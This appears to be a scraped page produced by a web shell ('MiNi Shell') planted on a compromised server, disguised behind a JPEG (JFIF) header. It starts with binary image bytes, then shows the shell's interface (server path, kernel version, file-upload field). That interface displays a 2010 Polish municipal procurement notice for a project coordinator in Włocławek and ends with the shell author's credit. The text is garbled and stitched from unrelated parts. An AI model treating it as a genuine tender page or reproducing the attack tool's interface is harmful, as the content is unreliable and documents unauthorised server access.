JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100824/262000-N-2010.html

<p class="kh_header"><b>Włocławek: Pełnienie funkcji Koordynatora Projektu pn, Samorząd Kujaw w odpowiedzi na wyzwania XXI wieku Nr POKL.05.02.01-00-252/09 realizowanego przez Gminę Włocławek jako lidera w partnerstwie z Gminą Kowal, Gminą Lubień Kujawski, Gminą Baruchowo, Gminą Choceń w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (Poddziałanie 5.2.1).</b><br>
<b>Numer ogłoszenia: 262000 - 2010; data zamieszczenia: 24.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Włocławek , ul. Królewiecka 7, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 0-54 230 53 00; 230 53 37, faks 054 230 53 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gmina.wloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Koordynatora Projektu pn, Samorząd Kujaw w odpowiedzi na wyzwania XXI wieku Nr POKL.05.02.01-00-252/09 realizowanego przez Gminę Włocławek jako lidera w partnerstwie z Gminą Kowal, Gminą Lubień Kujawski, Gminą Baruchowo, Gminą Choceń w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (Poddziałanie 5.2.1)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Koordynator Projektu będzie odpowiedzialny za:
a)	zarządzanie całością projektu, w tym zasobami kadrowymi, rzeczowymi i finansowymi,
b)	podejmowanie strategicznych decyzji finansowych,
c)	pisemne zatwierdzanie w siedzibie Zamawiającego raportów i sprawozdań zgodnie z zasadami Programu Operacyjnego Kapitał Ludzki, a w przypadku zgłoszenia przez Instytucję Pośredniczącą / Instytucję Wdrażającą wątpliwości bądź uwag dotyczących tych dokumentów - przygotowywanie pisemnych wyjaśnień w tym zakresie,
d)	nadzór nad przebiegiem procesu rekrutacji uczestników na poszczególnych etapach realizacji projektu,
e)	nadzór i zapewnienie prawidłowości rzeczowo-finansowej realizacji projektu zgodnie z założeniami wniosku o dofinansowanie i umową,
f)	bieżąca współpraca z Zespołem Zarządzającym i Grupą Sterującą, w tym organizacja systematycznych spotkań Zespołu, 
g)	bieżący monitoring projektu,
h)	zatwierdzanie dokumentów i pism zewnętrznych,
i)	reprezentowanie projektu wobec instytucji zewnętrznych,
j)	przygotowywanie, koordynowanie i kontrolowanie czynności związanych z wyborem podwykonawców zgodnie z Prawem Zamówień Publicznych i zasadą konkurencyjności POKL,
k)	nadzór nad promocją, ewaluacją i sprawozdawczością projektu zgodnie z Wytycznymi Programu Operacyjnego Kapitał Ludzki,
l)	pisemne zatwierdzanie w siedzibie Zamawiającego wymaganych sprawozdań do Instytucji Wdrażającej/Pośredniczącej, w tym wniosków o płatność, w wymaganych i obowiązujących terminach,
m)	uzgadnianie i przekazywanie w formie pisemnej informacji o dokonywanych zmianach w projekcie z IP/IW,
n)	przeprowadzanie kontroli wewnętrznych oraz zewnętrznych dotyczących realizacji projektu,
o)	weryfikowanie dokumentów projektu pod względem merytorycznym,
p)	dostosowanie dokumentów jednostki do obowiązującego w POKL obiegu dokumentacji,
q)	składanie terminowo (zgodnie z wymogami Zamawiającego) sprawozdania z przebiegu realizacji projektu,
r)	obsługa kontroli zewnętrznych,
s)	wykonywanie powierzonych zadań na sprzęcie komputerowym i biurowym w siedzibie Zamawiającego w zakresie koniecznym do prawidłowej realizacji zadań wykonywanych przez Wykonawcę w godzinach pracy Urzędu Gminy Włocławek,
t)	przedstawianie Zamawiającemu na piśmie propozycji dotyczących istotnych kwestii z zakresu projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże się następującą wiedzą i doświadczeniem:
1. Wymagane wykształcenie
a) potwierdzone wykształcenie wyższe drugiego stopnia w rozumieniu art. 1 pkt. 8 ustawy z dnia 27 lipca 2005 r. Prawo o szkolnictwie wyższym, Dz. U. Nr 164 poz. 1365 z póź. zm.
2. Wymagane doświadczenie
a) potwierdzone co najmniej 3 letnie doświadczenie w pracy w JST,
b) potwierdzone co najmniej roczne doświadczenie w pracy na stanowisku bezpośrednio związanym z funduszami europejskimi,
c) potwierdzone doświadczenie w koordynowaniu projektu o charakterze partnerskim,
d) potwierdzona znajomość procedur, zasad tworzenia, realizacji i wyboru projektów współfinansowanych z Funduszy Europejskich, w tym w szczególności Europejskiego Funduszu Społecznego,
e) posiadanie doświadczenia w zakresie przygotowania i realizacji procesu szkoleniowego dla osób dorosłych,
f) potwierdzenie dyspozycyjności tzn. stały dostęp telefoniczny, stawienie się w siedzibie Zamawiającego w ciągu 24 godzin od wezwania.
W celu potwierdzenia kwalifikacji do oferty należy dołączyć poświadczone przez Wykonawcę: kserokopie dyplomu ukończenia studiów, kserokopii posiadanych świadectw pracy, zaświadczeń i certyfikatów ukończonych szkoleń oraz innych dokumentów dotyczących uprawnień wymaganych do pełnienia funkcji koordynatora projektu.
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia - nie spełnia, na podstawie załączonych do oferty oświadczeń i dokumentów.
Jako kryterium wyboru oferty przyjmuje się kryterium najkorzystniejszej oferty:
- koszt zatrudnienia według poziomów: cena ofertowa - 20%
- udokumentowane doświadczenie, w tym co najmniej 3 letnie w pracy w JST oraz co najmniej roczne w pracy na stanowisku bezpośrednio związanym z funduszami europejskimi oraz w koordynowaniu projektem o charakterze partnerskim- 50%
- szkolenia, certyfikaty związane z realizacją i rozliczaniem projektów POKL - 30%.
 Przyjęta metoda przyznania punktów - polegać będzie na ocenie każdej oferty według 100 punktowej skali, przy czym oferta najkorzystniejsza, to ta, która otrzyma największą ilość punktów według wzorów:


Cena oferty najkorzystniejszej
------------------------------------ x 100 pkt.
cena wykonawcy oferty badanej.


Doświadczenie wykonawcy ofert najkorzystniejszej
----------------------------------------------------------x 100 pkt.
doświadczenie wykonawcy oferty badanej.


Szkolenia, certyfikaty wykonawcy oferty najkorzystniejszej
--------------------------------------------------------- x 100 pkt.
szkolenia, certyfikaty wykonawcy oferty badanej.

Każda inna oferta otrzymuje proporcjonalnie mniejszą ilość punktów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga złożenia 1) oferty sporządzonej zgodnie z wzorem stanowiącym załącznik do SIWZ, 2) projektu umowy, który stanowi załącznik do SIWZ zaakceptowanego poprzez złożenie podpisu Wykonawcy wraz ze słowem Akceptuję na ostatniej stronie i parafowania każdej ze stron dokumentu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 20</li>
<li>2 - Udokumentowane doświadczenie - 50</li>
<li>3 - Szkolenia, certyfikaty związane z realizacją i rozliczaniem projektów POKL - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zaprzestania finansowania projektu w wyniku rozwiązania umowy pomiędzy gminą Włocławek a Instytucją Wdrażającą, Wykonawca wyraża zgodę na rozwiązanie umowy i nie będzie rościł sobie pretensji do jakiegokolwiek odszkodowania z tego tytułu. W przypadku gdy zatwierdzony przez Instytucję Wdrażającą wniosek o dofinansowanie projektu będzie przewidywał skrócenie okresu jego realizacji Wykonawca otrzyma wynagrodzenie za rzeczywisty okres świadczenia usług będących przedmiotem zamówienia, obliczone proporcjonalnie w stosunku do wynagrodzenia za wykonanie tegoż przedmiotu zamówienia ujętego w treści oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gmina.włocławek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Włocławek
ul. Królewiecka 7
87-800 Włocławek
pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2010 godzina 10:00, miejsce: Urząd Gminy Włocławek
ul. Królewiecka 7
87-800 Włocławek
pokój nr 5 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Samorząd Kujaw w odpowiedzi na wyzwania XXI wieku Nr POKL.05.02.01-00-252/09 realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet V - Dobre rządzenie, Działanie 5.2 - Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 - Modernizacja zarządzania w administracji samorządowej. Celem tego projektu jest wzmocnienie potencjału administracji samorządowej szczebla gminnego w aspekcie podwyższenia poziomu i sprawności realizacji usług publicznych świadczonych na rzecz mieszkańców gmin: Włocławek, Kowal, Lubień Kujawski, Baruchowo, Choceń, poprzez wdrożenia usprawniające pracę pięciu urzędów i poprawę kompetencji 93 urzędników, w tym minimum 50% w wieku + 45 lat w okresie od 01.09.2010 do 31.05.2012 roku. W ramach projektu realizowane będą następujące działania : zarządzanie projektem, stworzenie Biura Obsługi Klientów w 5 urzędach, opracowanie i wdrożenie procedury aktualizowania opisu usług świadczonych w 5 jednostkach samorządu terytorialnego, wdrożenie systemu monitorowania poziomu satysfakcji klientów z jakości usług publicznych w 5 JST, szkolenia specjalistyczne dla urzędników z 5 JST przygotowujących decyzje administracyjne, szkolenia ogólne i specjalistyczne dla urzędników z 5 JST według potrzeb stanowiska pracy, studia podyplomowe i szkolenia językowe dla urzędników z 5 JST według potrzeb stanowiska pracy, stała wymiana doświadczeń i dobrych praktyk oraz porównywanie jakości wybranych usług publicznych pomiędzy 5 JST, wkład własny pochodzący ze środków budżetu 5 JST.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com